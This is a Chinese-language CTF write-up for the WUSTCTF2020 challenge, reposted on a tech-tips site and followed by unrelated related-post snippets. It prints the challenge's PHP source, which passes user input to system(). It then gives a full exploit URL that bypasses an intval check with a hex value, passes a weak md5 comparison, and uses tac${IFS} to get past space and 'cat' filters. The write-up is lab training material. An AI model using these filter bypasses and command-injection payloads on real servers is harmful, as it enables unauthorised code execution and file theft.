2. 程式人生 > 實用技巧 >刷題[WUSTCTF2020]樸實無華

刷題[WUSTCTF2020]樸實無華

阿新 發佈:2020-08-13

解題思路

開啟是一個這樣的頁面,檢視原始碼發現什麼人間極樂bot,試試是不是robots.txt,檢視發現類似flag檔案,檢視發現是假的flag,但是burp抓包後發現,返回的頭部有資訊

原始碼出來了,程式碼審計一波

程式碼審計

<?php 
header('Content-type:text/html;charset=utf-8'); 
error_reporting(0); 
highlight_file(__file__); 


//level 1 
if (isset($_GET['num'])){ 
    $num = $_GET['num']; 
    if(intval($num) < 2020 && intval($num + 1) > 2021){ 
        echo "我不經意間看了看我的勞力士, 不是想看時間, 只是想不經意間, 讓你知道我過得比你好.</br>"; 
    }else{ 
        die("金錢解決不了窮人的本質問題"); 
    } 
}else{ 
    die("去非洲吧"); 
} 
//level 2 
if (isset($_GET['md5'])){ 
   $md5=$_GET['md5']; 
   if ($md5==md5($md5)) 
       echo "想到這個CTFer拿到flag後, 感激涕零, 跑去東瀾岸, 找一家餐廳, 把廚師轟出去, 自己炒兩個拿手小菜, 倒一杯散裝白酒, 致富有道, 別學小暴.</br>"; 
   else 
       die("我趕緊喊來我的酒肉朋友, 他打了個電話, 把他一家安排到了非洲"); 
}else{ 
    die("去非洲吧"); 
} 

//get flag 
if (isset($_GET['get_flag'])){ 
    $get_flag = $_GET['get_flag']; 
    if(!strstr($get_flag," ")){ 
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag); 
        echo "想到這裡, 我充實而欣慰, 有錢人的快樂往往就是這麼的樸實無華, 且枯燥.</br>"; 
        system($get_flag); 
    }else{ 
        die("快到非洲了"); 
    } 
}else{ 
    die("去非洲吧"); 
} 
?>

大致看看,有幾層,成功繞後最後,可以通過system函式程式碼執行

第一層intval函式,算常見的考點吧,也總結過

那麼我們直接num=0x32303231 (即2021的16進位制)

第二層md5弱型別比較,我們只要找一個字串在md5處理後能通過弱比較即可

第三層也很簡單,繞過空格和cat即可,這都總結過

最終payload:/fl4g.php?num=0x32303231&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

總結思路

比較常規,跟著他一步一步走即可

知識點

  • php騷操作

相關推薦

[WUSTCTF2020]樸實無華

解題思路 開啟是一個這樣的頁面,檢視原始碼發現什麼人間極樂bot,試試是不是robots.txt,檢視發現類似flag檔案,檢視發現是假的flag,但是burp抓包後發現,返回的頭部有資訊

[WUSTCTF2020]CV Maker

解題思路 好傢伙,開啟一看像是cms,又看名字CV Maker。我以為直接要搜cve打了。搜了一會發現沒什麼啊。那先正常做把。

Python使用docx模組實現功能程式碼

起由: 前一陣子想要國二Python的庫,千方百計找到庫之後,開啟一個個word文件,發現一閱讀很麻煩,而且答案就在題目的下面,閱讀題目的時候想自己做出題目卻又總能不經意看到答案,甚煩!遂開始敲程

LeetCode力扣資料庫(183):從不訂購的客戶

文章目錄題目分析1.檢視customers表2.檢視orders表3.檢視訂單表中下單了的客戶id--cunstomersid4.過濾出顧客表中的id不在訂單表中的顧客資訊5.將過濾出的那些沒有下過單的顧客選擇出我們題目結果需要的列並改變列

-資料庫

給定一個 Weather 表,編寫一個 SQL 查詢,來查詢與之前(昨天的)日期相比溫度更高的所有日期的 Id。

vscode中配置LeetCode外掛的教程(愉快)

大家好,今早在B站看到up主的vscode裡藏了leetcode外掛,這才知道原來還有這款神器。但是沒想到在用的時候遇到了一些麻煩,花了一點時間才解決。所以寫這篇文章除了給大家安利這個好用的外掛之外,也是為了幫助更多的

LEETCODE 替換空格

#include<stdio.h> #include<stdlib.h> #include<string.h> void replaceBlank(char string[],int len)

leetcode筆記四十六 全排列

leetcode筆記四十六 全排列 源地址:46. 全排列 問題描述: 給定一個 沒有重複 數字的序列,返回其所有可能的全排列。

leetcode筆記五十三 最大子序和

leetcode筆記五十三 最大子序和 源地址:53. 最大子序和 問題描述: 給定一個整數陣列 nums ,找到一個具有最大和的連續子陣列(子陣列最少包含一個元素),返回其最大和。

leetcode筆記五十四 螺旋矩陣

leetcode筆記五十四 螺旋矩陣 源地址:54. 螺旋矩陣 問題描述: 給定一個包含 m x n 個元素的矩陣(m 行, n 列),請按照順時針螺旋順序,返回矩陣中的所有元素。

2020.7.10

3. 無重複字元的最長子串 第一次程式碼空間複雜度大: public class Solution { public int lengthOfLongestSubstring(String s) {

leetcode筆記五十八 最後一個單詞的長度

leetcode筆記五十八 最後一個單詞的長度 源地址:58. 最後一個單詞的長度 問題描述:

-LeetCode】165 Compare Version Numbers

Compare Version Numbers Compare two version numbers version1 and version2. If *version1* > *version2* return 1; if *version1* < *version2* return -1;otherwise return 0.

-LeetCode】179 Largest Number

Largest Number Given a list of non negative integers, arrange them such that they form the largest number.

-LeetCode】122 Best Time to Buy and Sell Stock II

Best Time to Buy and Sell Stock II Say you have an array for which the ith element is the price of a given stock on day i.

-LeetCode】123 Best Time to Buy and Sell Stock III

Best Time to Buy and Sell Stock III Say you have an array for which the ith element is the price of a given stock on day i.

buuoj 記錄(一)

目錄buuoj 記錄(一)[網鼎杯 2020 朱雀組]phpweb buuoj 記錄(一) [網鼎杯 2020 朱雀組]phpweb

2020.7.14

120. 三角形最小路徑和 動態規劃,自底向上 dp[i][j] :表示從i, j到底邊的最小距離

-LeetCode】191 Number of 1 Bits

Number of 1 Bits Write a function that takes an unsigned integer and return the number of \'1\' bits it has (also known as the Hamming weight).

-LeetCode】199 Binary Tree Right Side View

Binary Tree Right Side View Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.